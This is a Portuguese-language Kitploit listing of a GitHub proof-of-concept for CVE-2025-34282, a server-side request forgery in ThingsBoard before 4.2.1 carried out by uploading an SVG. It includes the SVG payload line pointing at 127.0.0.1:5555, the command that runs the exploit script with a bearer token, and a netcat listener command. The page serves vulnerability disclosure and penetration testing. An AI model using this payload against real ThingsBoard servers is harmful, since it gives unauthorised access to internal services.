Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
thingsboard-ssrf-cve-2025-34282 — Exploit PoC para CVE-2025-34282 - SSRF no ThingsBoard via Upload de Imagem SVG | Kitploit
Ferramentas/GitHubGitHub/mathitam/thingsboard-ssrf-cve-2025-34282
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoRed Teaming
GitHubmathitam/thingsboard-ssrf-cve-2025-34282

thingsboard-ssrf-cve-2025-34282

Exploit PoC para CVE-2025-34282 - SSRF no ThingsBoard via Upload de Imagem SVG

Ver Repositório
3há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-34282 — ThingsBoard SSRF via Upload de Imagem SVG

Visão Geral

Vulnerabilidade de Server-Side Request Forgery (SSRF) na plataforma ThingsBoard IoT em versões anteriores a 4.2.1.

Um atacante com acesso de Administrador de Locatário pode fazer upload de um arquivo SVG malicioso contendo uma referência de URL interna via Galeria de Upload de Imagem. Quando o ThingsBoard processa o SVG no lado do servidor, ele busca a URL referenciada — permitindo acesso a serviços internos não expostos à internet.

CampoDetalhes
CVECVE-2025-34282
Versão Afetada< 4.2.1
Versão Corrigida4.2.1
Pontuação CVSS6.9 Média
CWECWE-918 (Server-Side Request Forgery)
Fornecedorhttps://thingsboard.io

Cadeia de Ataque

  1. Administrador de Locatário faz upload de um SVG malicioso para POST /api/image
    • O servidor processa o SVG e emite uma requisição externa para a URL embutida
  2. Um widget personalizado é criado incorporando o publicLink do SVG através de uma tag <object>
    • A renderização do widget também aciona a busca no lado do servidor

Payload SVG

O payload ssrf_localhost_5555.svg embute uma referência de URL interna:

root@kitploit:~
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />

Quando enviado, o servidor do ThingsBoard busca http://127.0.0.1:5555, confirmando a SSRF.

Uso

Requisitos:

root@kitploit:~
pip install requests

Executar:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>

Exemplo:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...

Inicie um listener para capturar o callback da SSRF antes de executar o exploit:

root@kitploit:~
nc -l 5555

Referências

  • https://www.cve.org/CVERecord?id=CVE-2025-34282

Autor

Tamil Mathi T.

Baixar ferramenta